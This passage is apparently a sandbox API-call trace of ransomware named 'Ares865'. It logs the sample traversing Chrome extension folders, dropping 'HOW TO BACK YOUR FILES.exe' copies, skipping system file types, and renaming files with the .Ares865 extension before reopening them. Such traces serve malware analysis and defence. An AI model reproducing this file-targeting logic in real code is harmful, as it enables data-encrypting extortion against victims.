settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0100.648] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=21195) returned 1 [0100.652] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bg", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bg") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bg" [0100.652] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bg" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bg") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bg" [0100.652] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0100.652] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bg\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bg\\how to back your files.exe"), bFailIfExists=1) returned 0 [0100.653] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0100.653] GetLastError () returned 0x0 [0100.653] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0100.653] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bg\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x83403c50, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e22dce0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e22dce0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0100.653] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0100.653] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0100.653] lstrcpyW (in: lpString1=0x2cce528, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0100.653] lstrlenW (lpString="messages.json") returned 13 [0100.653] lstrlenW (lpString="Ares865") returned 7 [0100.653] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0100.654] lstrlenW (lpString=".dll") returned 4 [0100.654] lstrcmpiW (lpString1="messages.json", lpString2=".dll") returned 1 [0100.654] lstrlenW (lpString=".lnk") returned 4 [0100.654] lstrcmpiW (lpString1="messages.json", lpString2=".lnk") returned 1 [0100.654] lstrlenW (lpString=".ini") returned 4 [0100.654] lstrcmpiW (lpString1="messages.json", lpString2=".ini") returned 1 [0100.654] lstrlenW (lpString=".sys") returned 4 [0100.654] lstrcmpiW (lpString1="messages.json", lpString2=".sys") returned 1 [0100.654] lstrlenW (lpString="messages.json") returned 13 [0100.654] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bg\\messages.json.Ares865") returned 169 [0100.654] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bg\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bg\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bg\\messages.json.ares865"), dwFlags=0x1) returned 1 [0100.655] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bg\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bg\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0100.656] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=19299) returned 1 [0100.659] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ar", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ar") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ar" [0100.659] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ar" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ar") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ar" [0100.659] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0100.659] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ar\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ar\\how to back your files.exe"), bFailIfExists=1) returned 0 [0100.660] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0100.660] GetLastError () returned 0x0 [0100.660] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0100.660] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ar\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x833f7900, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e22dce0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e22dce0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0100.661] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0100.661] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0100.661] lstrcpyW (in: lpString1=0x2cce528, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0100.661] lstrlenW (lpString="messages.json") returned 13 [0100.661] lstrlenW (lpString="Ares865") returned 7 [0100.661] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0100.661] lstrlenW (lpString=".dll") returned 4 [0100.661] lstrcmpiW (lpString1="messages.json", lpString2=".dll") returned 1 [0100.661] lstrlenW (lpString=".lnk") returned 4 [0100.661] lstrcmpiW (lpString1="messages.json", lpString2=".lnk") returned 1 [0100.661] lstrlenW (lpString=".ini") returned 4 [0100.661] lstrcmpiW (lpString1="messages.json", lpString2=".ini") returned 1 [0100.661] lstrlenW (lpString=".sys") returned 4 [0100.661] lstrcmpiW (lpString1="messages.json", lpString2=".sys") returned 1 [0100.661] lstrlenW (lpString="messages.json") returned 13 [0100.661] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ar\\messages.json.Ares865") returned 169 [0100.661] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ar\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ar\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ar\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ar\\messages.json.ares865"), dwFlags=0x1) returned 1 [0100.662] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ar\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ar\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0100.663] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=17855) returned 1 [0100.666] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\am", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\am") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\am" [0100.666] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\am" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\am") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\am" [0100.666] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0100.666] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\am\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\am\\how to back your files.exe"), bFailIfExists=1) returned 0 [0100.667] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0100.667] GetLastError () returned 0x0 [0100.668] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0100.668] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\am\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x833e8ea0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e22dce0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e22dce0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0100.668] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0100.668] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0100.668] lstrcpyW (in: lpString1=0x2cce528, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0100.668] lstrlenW (lpString="messages.json") returned 13 [0100.668] lstrlenW (lpString="Ares865") returned 7 [0100.668] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0100.668] lstrlenW (lpString=".dll") returned 4 [0100.668] lstrcmpiW (lpString1="messages.json", lpString2=".dll") returned 1 [0100.668] lstrlenW (lpString=".lnk") returned 4 [0100.668] lstrcmpiW (lpString1="messages.json", lpString2=".lnk") returned 1 [0100.668] lstrlenW (lpString=".ini") returned 4 [0100.668] lstrcmpiW (lpString1="messages.json", lpString2=".ini") returned 1 [0100.668] lstrlenW (lpString=".sys") returned 4 [0100.668] lstrcmpiW (lpString1="messages.json", lpString2=".sys") returned 1 [0100.668] lstrlenW (lpString="messages.json") returned 13 [0100.668] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\am\\messages.json.Ares865") returned 169 [0100.668] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\am\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\am\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\am\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\am\\messages.json.ares865"), dwFlags=0x1) returned 1 [0100.670] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\am\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\am\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0100.670] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=18471) returned 1 [0100.681] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details" [0100.681] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details" [0100.681] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0100.681] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\how to back your files.exe"), bFailIfExists=1) returned 0 [0100.682] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0100.682] GetLastError () returned 0x0 [0100.682] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0100.683] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8368d2f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e253e40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e253e40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0100.683] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0100.683] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0100.683] lstrcpyW (in: lpString1=0x2cce538, lpString2="view.html" | out: lpString1="view.html") returned="view.html" [0100.683] lstrlenW (lpString="view.html") returned 9 [0100.683] lstrlenW (lpString="Ares865") returned 7 [0100.683] lstrcmpiW (lpString1="ew.html", lpString2="Ares865") returned 1 [0100.683] lstrlenW (lpString=".dll") returned 4 [0100.683] lstrcmpiW (lpString1="view.html", lpString2=".dll") returned 1 [0100.683] lstrlenW (lpString=".lnk") returned 4 [0100.683] lstrcmpiW (lpString1="view.html", lpString2=".lnk") returned 1 [0100.683] lstrlenW (lpString=".ini") returned 4 [0100.683] lstrcmpiW (lpString1="view.html", lpString2=".ini") returned 1 [0100.683] lstrlenW (lpString=".sys") returned 4 [0100.683] lstrcmpiW (lpString1="view.html", lpString2=".sys") returned 1 [0100.683] lstrlenW (lpString="view.html") returned 9 [0100.683] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\view.html.Ares865") returned 173 [0100.683] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\view.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\view.html"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\view.html.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\view.html.ares865"), dwFlags=0x1) returned 1 [0100.685] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\view.html.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\view.html.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0100.685] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=5964) returned 1 [0100.690] lstrcpyW (in: lpString1=0x2cce538, lpString2="view.js" | out: lpString1="view.js") returned="view.js" [0100.690] lstrlenW (lpString="view.js") returned 7 [0100.690] lstrlenW (lpString="Ares865") returned 7 [0100.690] lstrlenW (lpString=".dll") returned 4 [0100.690] lstrcmpiW (lpString1="view.js", lpString2=".dll") returned 1 [0100.690] lstrlenW (lpString=".lnk") returned 4 [0100.690] lstrcmpiW (lpString1="view.js", lpString2=".lnk") returned 1 [0100.690] lstrlenW (lpString=".ini") returned 4 [0100.690] lstrcmpiW (lpString1="view.js", lpString2=".ini") returned 1 [0100.690] lstrlenW (lpString=".sys") returned 4 [0100.690] lstrcmpiW (lpString1="view.js", lpString2=".sys") returned 1 [0100.690] lstrlenW (lpString="view.js") returned 7 [0100.690] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\view.js.Ares865") returned 171 [0100.690] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\view.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\view.js"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User 